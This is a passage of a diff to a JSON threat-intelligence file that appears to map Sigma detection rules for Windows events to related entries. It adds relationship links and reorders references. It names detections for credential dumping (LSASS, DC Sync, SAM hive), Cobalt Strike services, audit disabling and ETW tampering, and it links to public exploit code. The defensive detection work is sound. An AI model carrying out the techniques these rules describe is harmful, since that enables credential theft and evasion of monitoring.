"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" ], @@ -6091,6 +7733,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dae8171c-5ec6-4396-b210-8466585b53e9", "value": "SCM Database Privileged Operation" }, @@ -6116,6 +7767,22 @@ "attack.t1136.002" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7610cada-1499-41a4-b3dd-46467b68d177", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1bbf25b9-8038-4154-a50b-118f2a32be27", "value": "Suspicious Windows ANONYMOUS LOGON Local Account Created" }, @@ -6132,8 +7799,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml" ], "tags": [ @@ -6143,6 +7810,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "value": "Important Scheduled Task Deleted/Disabled" }, @@ -6170,6 +7846,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b0d77106-7bb0-41fe-bd94-d1752164d066", "value": "Rare Schtasks Creations" }, @@ -6218,6 +7903,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "value": "PowerShell Scripts Installed as Services - Security" }, @@ -6244,6 +7938,15 @@ "car.2013-07-002" ] }, + "related": [ + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8400629e-79a9-4737-b387-5db940ab2367", "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln" }, @@ -6292,6 +7995,15 @@ "attack.t1554" ] }, + "related": [ + { + "dest-uuid": "960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", "value": "HybridConnectionManager Service Installation" }, @@ -6345,6 +8057,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", "value": "Invoke-Obfuscation RUNDLL LAUNCHER - Security" }, @@ -6393,6 +8114,15 @@ "attack.t1003.006" ] }, + "related": [ + { + "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "17d619c1-e020-4347-957e-1d1207455c93", "value": "Active Directory Replication from Non Machine Account" }, @@ -6430,9 +8160,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml" ], @@ -6483,16 +8213,16 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", "http://managed670.rssing.com/chan-5590147/all_p1.html", "https://twitter.com/_xpn_/status/1268712093928378368", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml" ], "tags": [ @@ -6501,6 +8231,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", "value": "ETW Logging Disabled In .NET Processes - Registry" }, @@ -6527,6 +8266,15 @@ "attack.t1552.002" ] }, + "related": [ + { + "dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "value": "SAM Registry Hive Handle Request" }, @@ -6577,6 +8325,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "value": "Suspicious Scheduled Task Creation" }, @@ -6607,6 +8364,22 @@ "car.2013-07-002" ] }, + "related": [ + { + "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "69b8fd78-40e8-4600-ae4d-662c9d7afdb3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "value": "RDP over Reverse SSH Tunnel WFP" }, @@ -6656,6 +8429,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", "value": "Password Dumper Activity on LSASS" }, @@ -6681,6 +8463,15 @@ "attack.t1528" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "25cde13e-8e20-4c29-b949-4e795b76f16f", "value": "Suspicious Teams Application Related ObjectAcess Event" }, @@ -6731,6 +8522,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c265cf08-3f99-46c1-8d59-328247057d57", "value": "User Added to Local Administrators" }, @@ -6755,6 +8555,15 @@ "attack.t1136.001" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", "value": "Hidden Local User Creation" }, @@ -6817,8 +8626,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/duzvik/status/1269671601852813320", "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + "https://twitter.com/duzvik/status/1269671601852813320", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" ], "tags": [ @@ -6842,8 +8651,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", "https://github.com/topotam/PetitPotam", + "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" ], "tags": [ @@ -6851,6 +8660,15 @@ "attack.t1187" ] }, + "related": [ + { + "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "value": "Possible PetitPotam Coerce Authentication Attempt" }, @@ -6875,6 +8693,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "69aeb277-f15f-4d2d-b32a-55e883609563", "value": "Disabling Windows Event Auditing" }, @@ -6891,9 +8718,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", - "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" ], "tags": [ @@ -6918,8 +8745,8 @@ "logsource.product": "windows", "refs": [ "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/", - "https://msdn.microsoft.com/en-us/library/cc220234.aspx", "https://adsecurity.org/?p=3466", + "https://msdn.microsoft.com/en-us/library/cc220234.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" ], "tags": [ @@ -6927,6 +8754,15 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc", "value": "Active Directory User Backdoors" }, @@ -6968,9 +8804,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://twitter.com/SBousseaden/status/1581300963650187264?", "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", - "https://twitter.com/SBousseaden/status/1581300963650187264?", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" ], "tags": [ @@ -6978,6 +8814,15 @@ "attack.t1556" ] }, + "related": [ + { + "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f598ea0c-c25a-4f72-a219-50c44411c791", "value": "Possible Shadow Credentials Added" }, @@ -7004,6 +8849,15 @@ "attack.s0005" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1de68c67-af5c-4097-9c85-fe5578e09e67", "value": "WCE wceaux.dll Access" }, @@ -7020,9 +8874,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", "https://www.sans.org/webcasts/119395", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" ], "tags": [ @@ -7034,6 +8888,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "value": "CobaltStrike Service Installations - Security" }, @@ -7078,6 +8941,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0255a820-e564-4e40-af2b-6ac61160335c", "value": "Addition of Domain Trusts" }, @@ -7095,10 +8967,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" ], "tags": [ @@ -7107,6 +8979,15 @@ "attack.t1003.006" ] }, + "related": [ + { + "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "value": "Mimikatz DC Sync" }, @@ -7180,8 +9061,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1101431884540710913", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", + "https://twitter.com/SBousseaden/status/1101431884540710913", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" ], "tags": [ @@ -7208,8 +9089,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1490608838701166596", "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://twitter.com/SBousseaden/status/1490608838701166596", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" ], "tags": [ @@ -7217,6 +9098,15 @@ "attack.t1543" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "value": "Service Installed By Unusual Client - Security" }, @@ -7241,6 +9131,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", "value": "Enabled User Right in AD to Control User Objects" }, @@ -7258,8 +9157,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", - "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", "https://twitter.com/malmoeb/status/1511760068743766026", + "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" ], "tags": [ @@ -7296,6 +9195,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4", "value": "Suspicious Scheduled Task Update" }, @@ -7323,6 +9231,15 @@ "car.2016-04-005" ] }, + "related": [ + { + "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", "value": "Admin User Remote Logon" }, @@ -7349,6 +9266,15 @@ "cve.2021.34527" ] }, + "related": [ + { + "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8fe1c584-ee61-444b-be21-e9054b229694", "value": "CVE-2021-1675 Print Spooler Exploitation IPC Access" }, @@ -7374,6 +9300,15 @@ "attack.t1021.003" ] }, + "related": [ + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641", "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security" }, @@ -7449,6 +9384,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", "value": "Potential Remote Desktop Connection to Non-Domain Host" }, @@ -7465,8 +9409,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", + "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2020_0688.yml" ], "tags": [ @@ -7474,6 +9418,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d6266bf5-935e-4661-b477-78772735a7cb", "value": "CVE-2020-0688 Exploitation via Eventlog" }, @@ -7497,6 +9450,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", "value": "Atera Agent Installation" }, @@ -7522,6 +9484,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9703792d-fd9a-456d-a672-ff92efe4806a", "value": "Backup Catalog Deleted" }, @@ -7546,6 +9517,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", "value": "LPE InstallerFileTakeOver PoC CVE-2021-41379" }, @@ -7594,6 +9574,22 @@ "attack.t1218.007" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5594e67a-7f92-4a04-b65d-1a42fd824a60", "value": "MSI Installation From Web" }, @@ -7634,8 +9630,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", + "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml" ], @@ -7644,6 +9640,15 @@ "attack.t1588" ] }, + "related": [ + { + "dest-uuid": "ce0687a0-e692-4b77-964a-0784a8e54ff1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", "value": "Relevant Anti-Virus Event" }, @@ -7715,6 +9720,15 @@ "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "570ae5ec-33dc-427c-b815-db86228ad43e", "value": "Application Uninstalled" }, @@ -7731,8 +9745,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", "https://technet.microsoft.com/en-us/library/security/4022344", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml" ], "tags": [ @@ -7741,6 +9755,15 @@ "attack.t1562.001" ] }, + "related": [ + { + "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6c82cf5c-090d-4d57-9188-533577631108", "value": "Microsoft Malware Protection Engine Crash" }, @@ -7758,8 +9781,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml" ], "tags": [ @@ -7783,8 +9806,8 @@ "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55", - "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml" ], "tags": [ @@ -7792,6 +9815,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a18e0862-127b-43ca-be12-1a542c75c7c5", "value": "Potential Credential Dumping Via WER - Application" }, @@ -7811,8 +9843,8 @@ "https://twitter.com/DidierStevens/status/1217533958096924676", "https://nullsec.us/windows-event-log-audit-cve/", "https://twitter.com/VM_vivisector/status/1217190929330655232", - "https://www.youtube.com/watch?v=ebmW42YYveI", "https://twitter.com/FlemmingRiis/status/1217147415482060800", + "https://www.youtube.com/watch?v=ebmW42YYveI", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml" ], "tags": [ @@ -7830,6 +9862,50 @@ "attack.t1499.004" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", "value": "Audit CVE Event" }, @@ -7854,6 +9930,15 @@ "attack.t1546" ] }, + "related": [ + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "value": "MSSQL Extended Stored Procedure Backdoor Maggie" }, @@ -7870,8 +9955,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml" ], "tags": [ @@ -7918,8 +10003,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", + 